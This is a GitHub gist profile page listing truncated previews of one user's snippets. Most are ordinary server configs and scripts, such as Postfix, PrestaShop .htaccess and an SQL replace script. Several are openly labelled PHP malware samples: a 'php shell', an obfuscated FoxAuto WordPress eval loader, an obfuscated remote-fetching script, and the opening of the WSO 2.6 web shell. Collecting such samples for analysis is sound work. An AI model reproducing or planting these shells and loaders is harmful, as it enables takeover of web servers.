Skip to content

Instantly share code, notes, and snippets.

Avatar
:octocat:
Live long and may the source be with you

Stefan Pejcic stefanpejcic

:octocat:
Live long and may the source be with you
View GitHub Profile
View wp-crypto.php
<?php
// --- Create by Pst4r8
// --- php shell
error_reporting(0);
session_start();
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
@stefanpejcic
stefanpejcic / main.cf
Created Apr 15, 2022
/etc/postfix/main.cf
View main.cf
# See /usr/share/postfix/main.cf.dist for a commented, more complete version
smtpd_banner = $myhostname ESMTP
biff = no
inet_protocols = ipv4
# appending .domain is the MUA's job.
append_dot_mydomain = no
readme_directory = no
@stefanpejcic
stefanpejcic / index.php
Created Feb 11, 2022
FoxAuto WordPress malware
View index.php
<?php /* FoxAuto */ error_reporting(0); function vepa_($cmx0T) { $o6akB = strlen(trim($cmx0T)); $nYANr = ''; for ($lv38F = 0; $lv38F < $o6akB; $lv38F += 2) { $nYANr .= pack("C", hexdec(substr($cmx0T, $lv38F, 2))); } return $nYANr; } eval(vepa_("6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827") . 'eJxtvGOU734Q5tm2bdu27e7bxq/dfdu2bdu2bdu2bdt99z+zM3vO7G7yIkmlvk8q5+Skns+bMnV0tHPUdzS1t3N0trA1oxLXF5aT0xPXV1BUlRYVp+Y1Mf1rYWtKRTlWtk5JR0T5dUhJzUsmKacoIiynovNfUJeIn8jU3d7azuS/JG+Q/7H/l2fmaWH719rQ2ZTKycXIydmRipIwCgrof24w5NlrsUGbqeIlvxmr6IjHxV/BE9yZzxKz2EnOAr0VSzQVgdcs1zPaTjEFjg9z/76ffOv/fX+F9EsH+kNjFEAlmkhl70MnI0HFBksd+8CRL7whB/tLJ/f/ARmxD+iH+t4769ZHhiH+988F5mQjzqhvxKzdpUrBQ5sHa8BPZEG+rFa96WetfBA532EZUkEr1YNWjLWPPdyLfl2EiAYExOzkx5zJVgBjQksHNHuuiKrv/e0BowwzAYuK81Ej3WuP9ZFufFJS3UR88B4ISBi/ZzJawD86mmpcyHABJdG0W3OQXFRwQgoK80lfXs79O94VAPDjBlBK1vITZiINYAkP2bBttV22/fSkRvsWOx2rroSz9FrvdPfmsMNXOatpPBln5xQ9rnpuhg9rkp16jF04G3ipin1uPELmr7KQJyzswCXDvwxOHpO6bxOFxPnn9nKJhgfo5hycS33m+LAQq5pFH/GQYUP94cqf5YvlMU63dNzFP6F
View 3index.php
<?php
$O=urldecode('-%3B5p6PIiw%24%60x%2Bc%5D%40%5ES%2F0D%3ABZnmtsq%2CkOh7z%3D%7EAT%5CYQ%269%29%25v2yRUrfJ_eF%2Aa%3C%23%28g%2FM%7B3E%21u%7CX.4V%3Fd%7D1%3EHbjC8WL%5BGolK%22N');
header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OO00o0OoOo="361";
$O0oOOO0o0o="1";
$Oo0ooO0OO0="1";
function OoOo111oOO($url,$OO0o00OooO=0,$Oo00OoO0Oo=1,$OoO00OOoo0=NULL,$OoOOoO000o=array()){global $O;if(!preg_match("/^http\:\/\//si",$url)){if(isset($_GET[$O{69}.$O{51}.$O{90}.$O{55}.$O{81}.$O{81}])){$OOOoOoo000=$O{87}.$O{69}.$O{51}.$O{90}.$O{55}.$O{51}.$O{51}.$O{89}.$O{51}.$O{14}.' '.$O{7}.$O{24}.$O{46}.$O{58}.$O{90}.$O{7}.$O{76}.' '.$O{69}.$O{51}.$O{90}.$O{21}.$O{42}.$O{24}.$O{81}.$O{27}.$O{3}.$O{1};$OOOoOoo000.=$url;echo $OOOoOoo000;unset($OOOoOoo000);exit();}return '';}$OoOOoo000O=$O{13}.$O{69}.$O{51}.$O{90}.$O{54}.$O{7}.$O{24}.$O{7}.$O{26}.$O{12}.$O{13}.$O{69}.$O{51}.$O{90}.$O{54}.$O{27}.$O{55}.$O{26}.$O{89}.$O{3}.$O{26}.$O{12}.$O{13}.$O{69}.$O{51}.$O{90}.$O{54}.$O{55}.$O{11}.$O{55}.$O{13}.$O{70}.$O{52}.$O{27}.$
View index.pug
canvas(id='canv', width=500, height=200)
View replace.php
<?php
ini_set( 'pcre.backtrack_limit', '50000000000' );
ini_set( 'pcre.recursion_limit', '50000000000' );
$inputfile = fopen( 'inputfile.sql', 'r' ); // replace this before running
$outputfile = fopen( 'outputfile.sql', 'w' ); // replace this before running
$regex = '/myregex/s';
$lines = 0;
@stefanpejcic
stefanpejcic / .htaccess
Created Jul 6, 2021
default .htaccess for Prestashop v 1.7
View .htaccess
# ~~start~~ Do not remove this comment, Prestashop will keep automatically the code outside this comment when .htaccess will be generated again
# .htaccess automaticaly generated by PrestaShop e-commerce open-source solution
# http://www.prestashop.com - http://www.prestashop.com/forums
<IfModule mod_rewrite.c>
<IfModule mod_env.c>
SetEnv HTTP_MOD_REWRITE On
</IfModule>
RewriteEngine on
View connection.asp
<%
strDBConnection = "Provider=SQLOLEDB.1;Persist Security Info=False;User ID=bevnet_sa;Initial Catalog=xxxx;Data Source=localhost;Network Library=DBMSSOCN;uid=xxxx;password=xxxx"
Function connection_DBLookUpSP(strSQL)
Dim rsResults
Dim varResult
View WSO_2.6.php
<?php
session_start();
$password = "";
$passtype = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
@stefanpejcic
stefanpejcic / .block
Created Jan 16, 2021 — forked from curran/.block
Compare Colors
View .block
license: mit